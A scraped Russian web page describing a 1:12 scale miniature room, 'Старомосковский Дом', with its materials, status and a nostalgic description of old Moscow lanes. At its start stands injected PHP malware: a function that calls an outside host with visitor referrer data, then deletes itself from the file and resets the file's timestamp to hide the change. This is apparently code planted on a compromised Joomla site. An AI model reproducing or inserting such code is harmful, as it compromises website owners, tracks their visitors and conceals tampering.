check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732116){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Старомосковский Дом

Знаете ли вы...

При миниатюризации вес предмета уменьшается пропорционально кубу линейных размеров. Это означает, к примеру, что стул уменьшенный в 16 раз (в масштабе 1:16) весит в 16х16х16=4096 раз меньше оригинала.

Место действия: Большой Афанасьевский переулок, Москва, Россия.
Масштаб: 1:12
Материалы: дерево, картон, хлопок, антикварные кружева, фетр, акварель, морилка, акрил.
Свет: есть
Статус: продан, в частной коллекции

В этих старых московских переулочках своя особая - почти тайная! -прелесть. Здесь бежала навстречу своей судьбе литературная революционерка Вербицкая, здесь мерял шагами улицу Станиславский, шел, изнемогая, Маяковский, искал судьбу свою Булгаков… Год за годом, десятилетие за десятилетием провожали все эти особнячки с деревянными рамами окон, со старомодными форточками, с желтым светом лампочек из-за занавесок. Пол здесь потрескивает – это дышат старые половицы паркета, будто ходят по ним прежние жильцы. Но это совсем не страшно, сумерки здесь теплы и уютны. Мягкая шаль на кресле – только завернись в нее поуютнее и читай книгу. Благо, вон их сколько – целый стеллаж.

А можно просто задернуть шторы и сидеть на диване, вспоминая виденный нынче спектакль, программка от которого лежит на столике. Специальное «театральное» платье уже убрано в шкаф, и выпит вечерний чай, и пора ложиться спать, при мягком свете ночника мечтая о летних путешествиях с любимым чемоданом, пылящимся на шкафу до поры до времени. И вот уже спит все вокруг, а тишина арбатских переулков, звеня, рассказывает сказки Старого Арбата…

.